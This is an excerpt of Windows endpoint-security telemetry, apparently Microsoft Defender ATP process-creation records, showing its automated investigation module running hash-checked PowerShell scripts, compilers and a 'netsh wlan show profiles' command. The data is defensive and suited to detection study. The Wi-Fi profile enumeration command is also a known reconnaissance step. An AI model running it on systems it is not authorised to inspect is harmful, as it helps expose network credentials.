+582,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:52.308806500+00:00,2021-06-24 01:27:35.583666200+00:00,6e44be59-7a87-46e4-80e3-3c7215e634f0,computerpii_0a470890c60768167990033d701e7bd881398861,171694,False,10.7740.19041.1052,False,11540474045175619,,11540474045175659,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11584,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+583,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:52.301725300+00:00,14864,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:52.340139300+00:00,2021-06-24 01:27:35.583741500+00:00,102de3c4-99cf-43d5-b9cc-604b06df3461,computerpii_0a470890c60768167990033d701e7bd881398861,171695,False,10.7740.19041.1052,False,11540474045175659,,11540474045175663,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+584,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:52.481361400+00:00,7092,WmiPrvSE.exe,wmiprvse.exe -Embedding,PortableExecutable,2020-10-09 20:47:18.396187600+00:00,C:\Windows\System32\wbem\WmiPrvSE.exe,496640,60ff40cfd7fb8fe41ee4fe9ae5fe1c51,2198a7b58bccb758036b969ddae6cc2ece07565e2659a7c541a313a0492231a3,3ea7cc066317ac45f963c2227c4c7c50aa16eb7c,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:52.563210600+00:00,2021-06-24 01:27:35.584341400+00:00,9d1b2e7e-9ad9-4724-aae4-27420d171709,computerpii_0a470890c60768167990033d701e7bd881398861,171702,False,10.7740.19041.1052,False,11540474045136908,,11540474045175664,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Wmiprvse.exe,Wmiprvse.exe,WMI Provider Host
+585,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:57.874329900+00:00,3772,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\4s0123g1.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:52.276063300+00:00,15752,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9fc1b3b68c1e16ee6782bcaa19899c513dc6c13b.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9fc1b3b68c1e16ee6782bcaa19899c513dc6c13b.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'f7ed3f0185f9909f46bfe31eb7d83a13525be0156decf68c4371aa0d343a562e')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9fc1b3b68c1e16ee6782bcaa19899c513dc6c13b.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:57.937418+00:00,2021-06-24 01:27:35.593742+00:00,aa9f18c0-d56b-469e-8bf1-e99a4d1573c4,computerpii_0a470890c60768167990033d701e7bd881398861,171810,False,10.7740.19041.1052,False,11540474045175656,,11540474045175665,2021-06-24 01:25:52.276063300+00:00,15752,2021-06-24 01:25:52.276063300+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,15752,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+586,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:57.943536500+00:00,10024,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\dbihry1a\dbihry1a.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.279823300+00:00,4400,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'dd957e11064540b8cf34c19a86f451e4964cd2b223912701bc08567d61375d6c')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:57.970036300+00:00,2021-06-24 01:27:35.593824900+00:00,477df9a7-eb96-4baf-baa8-a438040b7b7b,computerpii_0a470890c60768167990033d701e7bd881398861,171811,False,10.7740.19041.1052,False,11540474045175657,,11540474045175666,2021-06-24 01:25:52.279823300+00:00,4400,2021-06-24 01:25:52.279823300+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,4400,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+587,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:58.258660800+00:00,11864,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\fgcbx2yy\fgcbx2yy.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.280238700+00:00,5396,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'a38d6942a28fff0188a34846e2109047922bc919012efd7e48948cd6491ea24f')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:58.293325300+00:00,2021-06-24 01:27:35.594853800+00:00,48b34863-a09f-49dc-ad97-49af28ee5b25,computerpii_0a470890c60768167990033d701e7bd881398861,171818,False,10.7740.19041.1052,False,11540474045175658,,11540474045175667,2021-06-24 01:25:52.280238700+00:00,5396,2021-06-24 01:25:52.280238700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,5396,16512,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+588,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:58.286539200+00:00,18924,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_880896a90c24fd2119e73fca64d9d9259e1df122.tmp"" ""c:\Windows\Temp\dbihry1a\FilePII_96b0bc9e3de6bc0795751341cc2a97e010c50149.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:57.943536500+00:00,10024,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\dbihry1a\dbihry1a.cmdline""",True,2021-06-24 01:25:52.279823300+00:00,4400,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:58.497340300+00:00,2021-06-24 01:27:35.595446900+00:00,73356287-21fb-4843-b2a7-d9b4a43fc419,computerpii_0a470890c60768167990033d701e7bd881398861,171825,False,10.7740.19041.1052,False,11540474045175666,,11540474045175668,2021-06-24 01:25:57.943536500+00:00,10024,2021-06-24 01:25:57.943536500+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,10024,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+589,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:58.300663600+00:00,3116,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_89ba481d638bf0ee0b1ee2a7c477709a7b213532.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_3ff887deb5142ff0092f1a05901ec652f1c50227.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:57.874329900+00:00,3772,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\4s0123g1.cmdline""",True,2021-06-24 01:25:52.276063300+00:00,15752,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:58.497907700+00:00,2021-06-24 01:27:35.595535100+00:00,07347f6f-1aa0-4ddc-9c94-d040e26f587a,computerpii_0a470890c60768167990033d701e7bd881398861,171826,False,10.7740.19041.1052,False,11540474045175665,,11540474045175669,2021-06-24 01:25:57.874329900+00:00,3772,2021-06-24 01:25:57.874329900+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,3772,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+590,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:58.409764800+00:00,1956,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_f5c39a29244fc2e79b6955be474475c0fe4d6eda.tmp"" ""c:\Windows\Temp\fgcbx2yy\FilePII_216d0643ff0090c7d0834309da4721ce37963673.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:58.258660800+00:00,11864,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\fgcbx2yy\fgcbx2yy.cmdline""",True,2021-06-24 01:25:52.280238700+00:00,5396,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:58.519141100+00:00,2021-06-24 01:27:35.595766800+00:00,4bf56852-52b4-472d-84c1-05b5f6b380f4,computerpii_0a470890c60768167990033d701e7bd881398861,171829,False,10.7740.19041.1052,False,11540474045175667,,11540474045175670,2021-06-24 01:25:58.258660800+00:00,11864,2021-06-24 01:25:58.258660800+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,11864,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+591,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:58.622507200+00:00,17916,netsh.exe,"""netsh.exe"" wlan show profiles",PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\netsh.exe,96768,6f1e6dd688818bc3d1391d0cc7d597eb,6b691b06fa865f52c9484ef4f10e2e02ed6d7c3a3f474b8b138a33af7258b2a9,9184e64c36629a1dcef084e19cc3e3bef78f2d7b,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.279823300+00:00,4400,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'dd957e11064540b8cf34c19a86f451e4964cd2b223912701bc08567d61375d6c')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:58.639614500+00:00,2021-06-24 